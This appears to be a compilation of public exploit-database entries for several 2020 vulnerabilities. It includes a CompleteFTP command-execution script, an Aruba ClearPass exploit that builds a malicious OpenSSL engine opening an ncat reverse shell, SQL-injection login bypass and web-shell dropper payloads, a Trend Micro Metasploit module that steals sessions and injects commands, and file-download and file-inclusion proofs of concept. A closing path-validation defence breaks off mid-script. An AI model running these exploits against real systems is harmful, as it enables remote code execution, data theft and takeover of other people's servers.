                   xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0"
                   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <i2:UpdateConfig id="ref-1" xmlns:i2="Admin API">
      <changes href="#ref-4"/>
    </i2:UpdateConfig>
    <a1:ConfigDataSet id="ref-4" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/EnterpriseDT.Net.FtpServer.Config/CompleteFTPManager%2C%20Version%3D8.3.3.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D48e55b33069804ce">
      <DataSet.RemotingVersion href="#ref-5"/>
      <XmlSchema id="ref-6">{XMLSCHEMA}</XmlSchema>
      <XmlDiffGram id="ref-7">{XMLDIFFGRAM}</XmlDiffGram>
    </a1:ConfigDataSet>
    <a2:Version id="ref-5" xmlns:a2="http://schemas.microsoft.com/clr/ns/System">
      <_Major>2</_Major>
      <_Minor>0</_Minor>
      <_Build>-1</_Build>
      <_Revision>-1</_Revision>
    </a2:Version>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""".strip()
# endregion

# region xml_schema
xml_schema = """
<?xml version="1.0" encoding="utf-16"?>
<xs:schema id="ConfigDataSet" targetNamespace="http://tempuri.org/ConfigDataSet.xsd" xmlns:mstns="http://tempuri.org/ConfigDataSet.xsd" xmlns="http://tempuri.org/ConfigDataSet.xsd" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:msprop="urn:schemas-microsoft-com:xml-msprop" attributeFormDefault="qualified" elementFormDefault="qualified">
  <xs:element name="ConfigDataSet" msdata:IsDataSet="true" msdata:Locale="en-US" msdata:TimestampingEnabled="False">
    <xs:complexType>
      <xs:choice minOccurs="0" maxOccurs="unbounded">
        <xs:element name="PlugIn">
          <xs:complexType>
            <xs:sequence>
              <xs:element name="PlugInID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="Name" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd">
                <xs:simpleType>
                  <xs:restriction base="xs:string">
                    <xs:maxLength value="100" />
                  </xs:restriction>
                </xs:simpleType>
              </xs:element>
              <xs:element name="ClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd">
                <xs:simpleType>
                  <xs:restriction base="xs:string">
                    <xs:maxLength value="400" />
                  </xs:restriction>
                </xs:simpleType>
              </xs:element>
              <xs:element name="PlugInTypeID" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="Configuration" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
              <xs:element name="CreatedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="ModifiedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="UserInstance" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
              <xs:element name="System" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="EditorClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0">
                <xs:simpleType>
                  <xs:restriction base="xs:string">
                    <xs:maxLength value="100" />
                  </xs:restriction>
                </xs:simpleType>
              </xs:element>
              <xs:element name="AssemblyPath" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0">
              </xs:element>
              <xs:element name="MinimumEdition" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
              <xs:element name="ChangeSetID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
            </xs:sequence>
          </xs:complexType>
        </xs:element>
        <xs:element name="Server">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="SiteUser">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="Site">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="Node">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="TrashHeap1">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="TrashHeap2">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="ChangeSet">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="RuntimeVariable">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
      </xs:choice>
    </xs:complexType>
    <xs:unique name="PlugIn_Constraint1" msdata:ConstraintName="Constraint1" msdata:PrimaryKey="true">
      <xs:selector xpath=".//mstns:PlugIn" />
      <xs:field xpath="mstns:PlugInID" />
    </xs:unique>
  </xs:element>
</xs:schema>
""".replace("<", "&lt;").replace(">", "&gt;").replace('"', "&quot;").strip()
# endregion

# region xml_diffgram
xml_diffgram = """
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
  <ConfigDataSet xmlns="http://tempuri.org/ConfigDataSet.xsd">
    <PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" diffgr:hasChanges="modified">
      <PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID>
      <Name>Process Execution</Name>
      <ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName>
      <PlugInTypeID>2</PlugInTypeID>
      <Configuration>{CONFIGURATION}</Configuration>
      <CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime>
      <ModifiedTime>2020-03-10T10:52:00.7496654+08:00</ModifiedTime>
      <UserInstance>false</UserInstance>
      <System>true</System>
      <ChangeSetID>{ID}</ChangeSetID>
    </PlugIn>
    <PlugInType diffgr:id="PlugInType1" msdata:rowOrder="0">
      <PlugInTypeID>2</PlugInTypeID>
      <Name>Event</Name>
      <CreatedTime>2009-06-29T11:48:00+08:00</CreatedTime>
      <ModifiedTime>2009-06-29T11:48:00+08:00</ModifiedTime>
    </PlugInType>
    <ChangeSet diffgr:id="ChangeSet1" msdata:rowOrder="0">
      <ChangeSetID></ChangeSetID>
      <Sequence>3</Sequence>
      <CreatedTime>2020-03-10T10:50:44.4209655+08:00</CreatedTime>
      <ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime>
      <IsPrimary>true</IsPrimary>
    </ChangeSet>
  </ConfigDataSet>
  <diffgr:before>
    <PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" xmlns="http://tempuri.org/ConfigDataSet.xsd">
      <PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID>
      <Name>Process Execution</Name>
      <ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName>
      <PlugInTypeID>2</PlugInTypeID>
      <Configuration></Configuration>
      <CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime>
      <ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime>
      <UserInstance>false</UserInstance>
      <System>true</System>
      <ChangeSetID></ChangeSetID>
    </PlugIn>
  </diffgr:before>
</diffgr:diffgram>
""".strip()
# endregion

# region config
config = """
<TriggerDataSet xmlns="http://tempuri.org/TriggerDataSet.xsd">
  <ProcessConfig>
    <ProcessConfigID>0</ProcessConfigID>
    <MaxProcesses>10</MaxProcesses>
    <RunTimeout>0</RunTimeout>
    <QueueTimeout>0</QueueTimeout>
    <KillOnExit>true</KillOnExit>
  </ProcessConfig>
  <ProcessRule>
    <ProcessRuleID>1</ProcessRuleID>
    <ProcessConfigID>0</ProcessConfigID>
    <Name>trigger</Name>
    <Enabled>true</Enabled>
    <ProcessType>0</ProcessType>
    <ProcessPath>cmd.exe</ProcessPath>
    <Arguments>/c {CMD}</Arguments>
    <PathFilter>*</PathFilter>
    <OnError>false</OnError>
    <OnSuccess>true</OnSuccess>
    <RowOrder>1</RowOrder>
  </ProcessRule>
  <ProcessEvent>
    <ProcessRuleID>1</ProcessRuleID>
    <EventType>LogIn</EventType>
  </ProcessEvent>
</TriggerDataSet>
""".strip()
# endregion


def prepare_update_config(uuid, cmd):
    # The trigger config is embedded as escaped text inside the diffgram,
    # which is in turn embedded as escaped text inside the SOAP envelope.
    config_payload = config
    config_payload = config_payload.replace('{CMD}', cmd)
    config_payload = config_payload.replace('<', '&lt;')
    config_payload = config_payload.replace('>', '&gt;')

    diffgram_payload = xml_diffgram
    diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload)
    diffgram_payload = diffgram_payload.replace('{ID}', uuid)
    diffgram_payload = diffgram_payload.replace('&', '&amp;')
    diffgram_payload = diffgram_payload.replace('<', '&lt;')
    diffgram_payload = diffgram_payload.replace('>', '&gt;')
    diffgram_payload = diffgram_payload.replace('"', '&quot;')

    payload = update_config
    payload = payload.replace('{XMLSCHEMA}', xml_schema)
    payload = payload.replace('{XMLDIFFGRAM}', diffgram_payload)
    return payload


def send_request(sftp, payload):
    payload = b64encode(bytes(payload, 'utf-8')).decode('utf-8')
    res = sftp._request(CMD_EXTENDED, 'admin@enterprisedt.com', 'SOAP64 ' + payload)
    return res


def convert_changeset_id_to_uuid(changeset_id):
    a = struct.pack('i', int(changeset_id[0].text))   # 32
    b = struct.pack('h', int(changeset_id[1].text))   # 16
    c = struct.pack('h', int(changeset_id[2].text))   # 16
    d = struct.pack('B', int(changeset_id[3].text))   # 8
    e = struct.pack('B', int(changeset_id[4].text))   # 8
    f = struct.pack('B', int(changeset_id[5].text))   # 8
    g = struct.pack('B', int(changeset_id[6].text))   # 8
    h = struct.pack('B', int(changeset_id[7].text))   # 8
    i = struct.pack('B', int(changeset_id[8].text))   # 8
    j = struct.pack('B', int(changeset_id[9].text))   # 8
    k = struct.pack('B', int(changeset_id[10].text))  # 8
    x = a + b + c + d + e + f + g + h + i + j + k
    return uuid.UUID(bytes_le=x)


def get_uuid(sftp):
    res = send_request(sftp, get_server_info)
    if res[0] != 201:
        print('[!] Error could not request server info via SFTP')
        sys.exit(1)
    res = b64decode(res[1].get_string()).decode('utf-8')
    res = ET.fromstring(res)
    changeset_id = res.find('.//SyncChangeSetID')
    uuid = convert_changeset_id_to_uuid(changeset_id)
    return str(uuid)


def login(host, port, user, password):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(host, port, user, password, look_for_keys=False, allow_agent=False)
    return ssh.open_sftp()


def send_command(sftp, cmd):
    uuid = get_uuid(sftp)
    payload = prepare_update_config(uuid, cmd)
    res = send_request(sftp, payload)
    if res[0] != 201:
        print('[!] 
Error could not send update config request via SFTP') sys.exit(1) def decrypt_password(password): key = b64decode('HKVV76GdVuzXne/zxtWvdjA2d2Am548E') iv = b64decode('gVGow/9uLvM=') encrypted = b64decode(password) cipher = DES3.new(key=key, iv=iv, mode=DES3.MODE_CBC) decrypted = cipher.decrypt(encrypted) return unpad(decrypted, 8).decode('utf-16') if len(sys.argv) != 6: print('[!] Missing arguments') print('[ ] Usage: {} <target> <port> <username> <encrypted-password> <cmd>'.format(sys.argv[0])) print("[ ] E.g. {} 192.168.1.128 14983 admin DEomw27OY7sYZs4XjYA2kVB4LEB5skN4 'whoami > C:\\x.txt'".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) username = sys.argv[3] password = sys.argv[4] cmd = sys.argv[5] print('[ ] Decrypting password') password = decrypt_password(password) print('[ ] Decrypted password is "{}"'.format(password)) print('[ ] Logging in') sftp = login(target, port, username, password) print('[ ] Sending command') send_command(sftp, cmd) print('[ ] Command successfully sent, triggering...') sftp = login(target, port, username, password)
-
Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution
# Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution
# Date: 2020-07-06
# Exploit Author: SpicyItalian
# Vendor Homepage: https://www.arubanetworks.com/products/security/network-access-control/
# Version: ClearPass 6.7.x prior to 6.7.13-HF, ClearPass 6.8.x prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1
# Tested on: ClearPass 6.7.0
# CVE: CVE-2020-7115

Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine.

#!/usr/bin/env bash

if [ "$#" -ne 4 ]; then
    echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
    exit 0
fi

# Shared object whose constructor runs the moment openssl loads it as an "engine";
# $3/$4 (local host/port) are expanded into the C source by the heredoc.
cat <<EOF >>payload.c
#include <unistd.h>

__attribute__((constructor)) static void init() {
    execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF

gcc -fPIC -c payload.c
gcc -shared -o payload.so -lcrypto payload.o
rm -f payload.c payload.o

# The uploaded file is written to /tmp/clientCertFile*.txt and clientPassphrase is passed
# to the openssl command line, so "-engine <that path>" makes openssl dlopen our .so.
curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &

cat <<"EOF"
   /(\
  ¡ !´\
  | )\ `.
  | `.) \,-,--
  ( / /
   `'-.,;_/
      `----
EOF

printf "\nPleasea waita for your spicy shell...\n\n"
ncat -v -l $3 $4
-
Barangay Management System 1.0 - Authentication Bypass
# Exploit Title: Barangay Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-07-05
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/13484/barangay-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/antiokz/barangay_1.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : index.php
# Parameter & Payload: '=''or'
# Proof of Concept: http://localhost/Barangay/adminlogin.php

POST /Barangay/adminlogin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Referer: http://localhost/Barangay/
Cookie: PHPSESSID=jt0a3e89ukmktgtuoedjqmktge
Connection: keep-alive
Upgrade-Insecure-Requests: 1

admin_name=%27%3D%27%27or%27&admin_pass=%27%3D%27%27or%27&adminlogin=Login: undefined

HTTP/1.1 200 OK
Date: Sat, 04 Jul 2020 20:35:25 GMT
Server: Apache/2.4.39 (Win64) PHP/7.2.18
X-Powered-By: PHP/7.2.18
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 3638
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
HelloWeb 2.0 - Arbitrary File Download
# Exploit Title: HelloWeb 2.0 - Arbitrary File Download
# Date: 2020-07-09
# Vendor Homepage: https://helloweb.co.kr/
# Version: 2.0 [Latest] and previous versions
# Exploit Author: bRpsd
# Contact Author: cy[at]live.no
# Google Dork: inurl:exec/file/download.asp
# Type: WebApps / ASP

-----------------------------------------------------
Vulnerable code:
######################################################################################################

Dim filepath, filename, root_path, fso, root_folder, attachfile, objStream, strFile

filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
root_path = server.MapPath("/")

Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename

Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = 1
objStream.LoadFromFile attachfile
Response.BinaryWrite objStream.Read
Response.Flush

######################################################################################################

Vulnerability: Arbitrary File Download
Location: http://localhost/exec/file/download.asp
Parameters: filename & filepath

Proof of concept:

GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

RESPONSE:

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
-
Park Ticketing Management System 1.0 - 'viewid' SQL Injection
# Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection
# Date: 2020-07-13
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)

import requests

# this script is for POC purpose, you could add your own error checking mechanism
command = "whoami"

# UNION-based injection in viewid; the hex literal is
# <?php system($_REQUEST['gh1mau']); ?> and INTO OUTFILE writes it into the web root
url = "http://localhost:80/ptms/view-normal-ticket.php?viewid=1%27%20UNION%20ALL%20SELECT%200x3c3f7068702073797374656d28245f524551554553545b276768316d6175275d293b203f3e,NULL,NULL,NULL,NULL,NULL,NULL%20INTO%20OUTFILE%20%27C:/UwAmp/www/ptms/1.php%27--%20-"
payload = ""
headers = {
    "Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Connection": "close",
    "Host": "localhost",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
    "Accept-Language": "en-US,en;q=0.5"
}
response = requests.request("GET", url, data=payload, headers=headers)
print("[+] Injecting Web Shell...\n")

# Call the dropped shell with the command in the gh1mau parameter
url2 = "http://localhost:80/ptms/1.php?gh1mau=" + command
payload2 = ""
headers2 = {
    "Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
    "Connection": "close",
    "Host": "localhost",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
    "Accept-Language": "en-US,en;q=0.5"
}
response2 = requests.request("GET", url2, data=payload2, headers=headers2)
print("Web Shell: " + url2)
print(response2.text)
-
Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
        'Description' => %q{
          This module exploits multiple vulnerabilities together in order to achieve remote code execution.
          Unauthenticated users can execute a terminal command under the context of the root user.

          The specific flaw exists within the LogSettingHandler class of the administrator interface software.
          When parsing the mount_device parameter, the process does not properly validate a user-supplied
          string before using it to execute a system call. An attacker can leverage this vulnerability to
          execute code in the context of root. But authentication is required to exploit this vulnerability.

          Another specific flaw exists within the proxy service, which listens on port 8080 by default.
          Unauthenticated users can exploit this vulnerability in order to communicate with internal
          services in the product.

          Last but not least, a flaw exists within the Apache Solr application, which is installed within
          the product. When parsing the file parameter, the process does not properly validate a
          user-supplied path prior to using it in file operations. An attacker can leverage this
          vulnerability to disclose information in the context of the IWSS user.

          Due to the combination of these vulnerabilities, unauthenticated users can execute a terminal
          command under the context of the root user.

          Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
        ],
        'References' => [
          ['CVE', '2020-8604'],
          ['CVE', '2020-8605'],
          ['CVE', '2020-8606'],
          ['ZDI', '20-676'],
          ['ZDI', '20-677'],
          ['ZDI', '20-678']
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'SSL' => true,
          'payload' => 'python/meterpreter/reverse_tcp',
          'WfsDelay' => 30
        },
        'Payload' => {
          'Compat' => {
            'ConnectionType' => '-bind'
          }
        },
        'Platform' => ['python'],
        'Arch' => ARCH_PYTHON,
        'Targets' => [
          ['Automatic', {}]
        ],
        'DisclosureDate' => '2020-06-10',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8443),
        OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])
      ]
    )
  end

  def hijack_cookie
    # Updating SSL and RPORT in order to communicate with the HTTP proxy service.
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end
    port_restore = datastore['RPORT']
    datastore['RPORT'] = datastore['PROXY_PORT']

    @jsessionid = ''

    # We are exploiting the proxy service vulnerability in order to fetch the content of catalina.out
    # (an absolute URL through the proxy reaches the internal Solr instance, whose replication
    # handler does not validate the file parameter).
    print_status('Trying to extract session ID by exploiting reverse proxy service')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
      'vars_get' => {
        'command' => 'filecontent',
        'wt' => 'filestream',
        'generation' => 1,
        'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'
      }
    })

    # We gotta switch back to the administrator interface port instead of the proxy service.
    datastore['SSL'] = true if ssl_restore
    datastore['RPORT'] = port_restore

    # Routine check on res object
    unless res
      fail_with(Failure::Unreachable, 'Target is unreachable.')
    end

    # If the res code is not 200 that means the proxy service is not vulnerable.
    unless res.code == 200
      @jsessionid = -1
      return
    end

    # Now we are going to extract all JSESSIONIDs from the log file and store them in an array.
    cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten
    if cookies.empty?
      @jsessionid = 0
      print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')
      return
    end

    print_good("Extracted number of JSESSIONID: #{cookies.length}")

    # The latest cookie in the log file is the one most probably active, so we reverse the array.
    cookies.reverse.each_with_index do |cookie, index|
      print_status("Testing JSESSIONID ##{index} : #{cookie}")

      # This endpoint basically checks the session :)
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
        'cookie' => "JSESSIONID=#{cookie}"
      })

      # Routine res check
      unless res
        fail_with(Failure::UnexpectedReply, 'Target is unreachable.')
      end

      # If the cookie is active !
      if res.code == 200 && res.body.include?('session_flag')
        print_good("Awesome!!! JSESSIONID ##{index} is active.")
        @jsessionid = cookie
        break
      end

      print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
    end

    if @jsessionid.empty?
      print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')
    end
  end

  def check
    #
    # @jsessionid can be one of the following values
    #
    # -1     = Proxy service is not vulnerable, which means we're not gonna
    #          be able to read catalina.out
    #
    # 0      = Proxy service is vulnerable, but catalina.out does not contain any
    #          jsessionid string yet !
    #
    # empty  = Proxy service is vulnerable, jsessionids are in the log file but
    #          none of them are valid :(
    #
    # string = Proxy service is vulnerable and sessionid is valid !
    #
    hijack_cookie

    if @jsessionid == -1
      CheckCode::Safe
    else
      CheckCode::Vulnerable
    end
  end

  def exploit
    unless check == CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    #
    # 0     => Proxy service is vulnerable, but catalina.out does not contain any
    #          jsessionid string yet !
    #
    # empty => Proxy service is vulnerable, jsessionids are in the log file but
    #          none of them are valid :(
    #
    # Test the Integer case first: 0 does not respond to empty?.
    if @jsessionid == 0 || @jsessionid.empty?
      fail_with Failure::NoAccess, 'No valid JSESSIONID could be obtained'
    end

    print_status('Exploiting command injection vulnerability')

    # Yet another app specific bypass is going on here.
    # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)
    # For that reason, I am planting our payload dropper within the perl command: the real command
    # travels hex-encoded and is unpacked with pack("H*") on the target, so no quotes or slashes
    # reach the blacklist.
    cmd = "python -c \"#{payload.encoded}\""
    final_payload = cmd.to_s.unpack1('H*')
    p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"

    vars_post = {
      mount_device: "mount $(#{p}) /var/offload",
      cmd: 'mount'
    }

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
      'cookie' => "JSESSIONID=#{@jsessionid}",
      'ctype' => 'application/json',
      'data' => vars_post.to_json
    })
  end
end
-
BSA Radar 1.6.7234.24750 - Local File Inclusion
# Exploit title: BSA Radar 1.6.7234.24750 - Local File Inclusion
# Date: 2020-07-08
# Exploit Author: William Summerhill
# Vendor homepage: https://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE-2020-14946 - Local File Inclusion
# Description: The Administrator section of the Surveillance module in Global RADAR - BSA Radar 1.6.7234.X
# and lower allows users to download transaction files. When downloading the files,
# a user is able to view local files on the web server by manipulating the FileName
# and FilePath parameters in the URL, or while using a proxy. This vulnerability could
# be used to view local sensitive files or configuration files on the backend server.

Vulnerable endpoint: /UC/downloadFile.ashx

The current user is required to have valid privileges to send requests to the target vulnerable endpoint.

Proof of Concept:

HTTP Request PoC:

VALID REQUEST:
GET /UC/downloadFile.ashx?ID=XXXX&FileName=SOMEFILE.TXT&UploadStyle=1&UploadStyle=1&UploadSource=6

LFI EXPLOIT REQUEST:
GET /UC/downloadFile.ashx?ID=XXXX&FileName=C:\Windows\debug\NetSetup.log&UploadStyle=1&UploadSource=6

The entire LFI path can be injected into the "FileName" parameter in order to enumerate existing files on the server.
Other LFI files can be tested (such as the Windows hosts file) for further verification and disclosures.

Tested on: Windows

CVE: CVE-2020-14946
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14946
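The HelloWeb download.asp handler earlier on this page and the BSA Radar downloadFile.ashx endpoint above share one defect: a caller-controlled FilePath/FileName is glued onto a base directory (`root_path & filepath & "\" & filename`) and the result is opened without asking where it landed. An absolute FileName replaces the base entirely, and `..` segments walk out of it. The block below is an added example, not code from either vendor, of the check such a handler needs, written with Windows path semantics (ntpath) so it runs anywhere. The root directory, function names and sample inputs are assumptions; the sample inputs are constructed from the two PoCs on this page.

```python
import ntpath


class UnsafePathError(ValueError):
    """The requested download would resolve outside the allowed directory."""


def resolve_download_path(root, filepath, filename):
    """Validated equivalent of  root & filepath & "\\" & filename.

    root     - directory downloads may come from, e.g. C:\\inetpub\\wwwroot\\uploads
               (assumed name; serve from a dedicated folder, never the web root,
               or web.config and friends stay reachable even with this check)
    filepath - caller-controlled sub-directory; "/" or "" means the root itself
    filename - caller-controlled bare file name

    Returns the normalized absolute path, or raises UnsafePathError.
    """
    if "\x00" in filepath or "\x00" in filename:
        raise UnsafePathError("NUL byte in path component")

    # A leading separator makes ntpath.join discard the root (the HelloWeb
    # PoC sends filepath=/), so treat the sub-directory as relative however
    # it is spelled.
    filepath = filepath.replace("/", "\\").lstrip("\\")

    # Drive or UNC prefixes (C:..., \\server\share) are never acceptable in
    # either parameter; this is the BSA Radar FileName=C:\Windows\... case.
    for part in (filepath, filename):
        if ntpath.splitdrive(part)[0]:
            raise UnsafePathError("drive or UNC prefix in %r" % part)

    # The file name must be a single path element.
    if filename in ("", ".", "..") or "\\" in filename or "/" in filename:
        raise UnsafePathError("filename is not a plain name: %r" % filename)

    root_norm = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_norm, filepath, filename))

    # normpath collapses "..", so any traversal shows up as a path that no
    # longer starts with the root. NTFS is case-insensitive, so compare lower.
    root_prefix = root_norm.rstrip("\\").lower() + "\\"
    if not candidate.lower().startswith(root_prefix):
        raise UnsafePathError("path escapes root: %r" % candidate)
    return candidate


def is_download_allowed(root, filepath, filename):
    """Boolean wrapper for use in a request handler."""
    try:
        resolve_download_path(root, filepath, filename)
        return True
    except UnsafePathError:
        return False


if __name__ == "__main__":
    # Constructed inputs mirroring the two PoCs on this page
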